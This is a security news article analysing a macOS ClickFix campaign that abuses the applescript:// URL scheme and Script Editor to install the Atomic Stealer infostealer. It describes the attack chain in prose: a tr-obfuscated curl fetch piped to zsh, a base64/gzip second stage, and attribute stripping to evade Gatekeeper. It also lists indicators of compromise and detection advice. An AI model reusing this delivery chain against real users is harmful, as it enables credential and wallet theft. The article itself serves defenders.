A sophisticated ClickFix-style attack targeting macOS users that ditches the conventional Terminal execution path entirely, instead weaponizing macOS Script Editor via the applescript:// URL scheme to silently deliver the Atomic Stealer infostealer, exposing the limits of Apple’s recently introduced Terminal safeguards.
Familiar Attack and New Execution
ClickFix is a well-established social engineering technique that manipulates users into copying and pasting malicious shell commands into Terminal under the pretense of routine system maintenance or troubleshooting.
Its growing success prompted Apple to act: in macOS Tahoe 26.4, the company quietly introduced a Terminal-level security feature that scans and delays the execution of pasted commands, warning users of potential harm before anything runs. The warning message reads, “Possible malware, paste blocked. Your Mac has not been harmed.”
For a brief moment, it seemed like a meaningful win for defenders. But attackers adapted almost immediately.
Researchers identified a new ClickFix variant through one of their behavioral detection mechanisms, which flagged Script Editor-based execution as suspicious runtime activity.
Rather than abandoning the ClickFix template, threat actors simply relocated the execution point, swapping Terminal for Script Editor, a native macOS application pre-installed on every Mac and designed for running AppleScript and JXA (JavaScript for Automation) code.
Script Editor’s trusted status in macOS makes it an ideal vehicle for abuse, and its history as a malware delivery mechanism is well documented.
Fake Apple Disk Cleanup Page
The infection chain begins with a convincing, Apple-branded webpage masquerading as a disk space optimization utility. The page presents users with a series of step-by-step instructions that closely mirror legitimate macOS maintenance guidance, complete with polished UI elements designed to earn the victim’s trust.
When the user clicks the “Execute” button on the page, the site silently triggers an embedded applescript:// The URL scheme is a browser-level mechanism that requests permission to open the Script Editor directly.
The browser surfaces a standard permission dialog asking whether to allow Script Editor to open, which most users interpret as a routine system prompt rather than a threat indicator.
Once approved, Script Editor launches with a pre-populated script that carries fake copyright headers falsely attributing the code to Apple Inc., deepening the illusion of legitimacy.
This approach is notably more streamlined than traditional ClickFix: the user is never asked to open Terminal or type commands manually; they are simply guided from a webpage into an already-prepared execution environment.
Obfuscated Execution and Multi-Stage Payload Delivery
Once the user runs the pre-filled script in Script Editor, the attack chain unfolds in carefully staged steps.
The initial script executes a curl command obfuscated using the Unix tr utility, which performs character translation at runtime to reconstruct a valid URL from a scrambled string. This obfuscation pattern has been observed across multiple newer variants of the campaign.
The decoded command reaches out to dryvecar[.]com to retrieve a second-stage payload using the -k flag to turn off TLS certificate validation, allowing the operation to proceed over untrusted or potentially intercepted infrastructure. Critically, the downloaded content is executed directly in memory via a pipe to zsh, leaving no file written to disk during this phase.
The second-stage payload is wrapped in base64 encoding and gzip compression, adding another layer of obfuscation before execution.
Once decoded, it downloads a Mach-O binary identified as a recent variant of Atomic Stealer (AMOS) to /tmp/helper, strips extended attributes to bypass Gatekeeper checks, sets execution permissions, and runs the binary.
Atomic Stealer is a macOS-specific infostealer and backdoor that can harvest credentials, browser data, crypto wallets, and sensitive system information.
macOS Version Behavior Differences
Researchers noted that Script Editor’s behavior varies across macOS versions. On macOS Tahoe 26.4, an additional warning prompt is presented, requiring users to explicitly allow the script to be saved to disk before execution, adding a small but meaningful layer of friction.
Earlier macOS versions did not include this prompt, meaning the attack can execute with less user interaction on unpatched systems.
This version-dependent behavior underscores the importance of keeping macOS updated, even as it highlights that security prompts alone are insufficient deterrents against determined social engineering campaigns.
Arms Race in Full Motion
ClickFix activity surged by more than 500% in the first half of 2025, making it the second-most common attack vector after phishing, according to ESET. Apple’s Terminal warning was a direct response to this trend, but as this campaign illustrates, when one door closes, attackers immediately locate another.
The shift from Terminal to Script Editor is a small technical adjustment with outsized implications. It preserves the core ClickFix social engineering logic while evading the latest host-based controls, and it can be triggered entirely via a URL scheme with minimal user interaction.
Jamf Threat Labs continues to monitor the campaign’s infrastructure and track emerging variants. Organizations using Jamf Protect can configure Threat Prevention, Advanced Threat Controls, and Web Protection features to block and report similar threats.
Security teams are advised to monitor for unexpected applescript:// URL scheme invocations from browser processes and enforce application allow-listing policies that restrict Script Editor usage in enterprise environments.
Indicators of Compromise
- Domain:
dryvecar[.]com - Payload path:
/curl/04566d1d3f9717b2e7e6b643775d9ca72cef942f6df9ce075cf8c73a1bd2565a - Second-stage path:
/cleaner3/update - Dropped binary:
/tmp/helper(Atomic Stealer Mach-O)
FAQ
Q1: What is the ClickFix attack technique?
ClickFix is a social engineering method that tricks users into pasting and executing malicious commands under the guise of system troubleshooting or maintenance.
Q2: Why did attackers switch from Terminal to Script Editor?
Apple’s macOS Tahoe 26.4 introduced Terminal paste warnings that block suspicious commands, prompting attackers to pivot to Script Editor as an unprotected execution vector.
Q3: What does Atomic Stealer do once installed on a Mac?
Atomic Stealer harvests credentials, browser data, cryptocurrency wallets, and other sensitive information from compromised macOS systems.
Q4: How can users protect themselves from this Script Editor-based ClickFix attack?
Users should avoid clicking “Execute” buttons on unfamiliar web pages, keep macOS up to date, and enterprises should deploy endpoint security tools like Jamf Protect.
Site: thecybrdef.com
About the Author
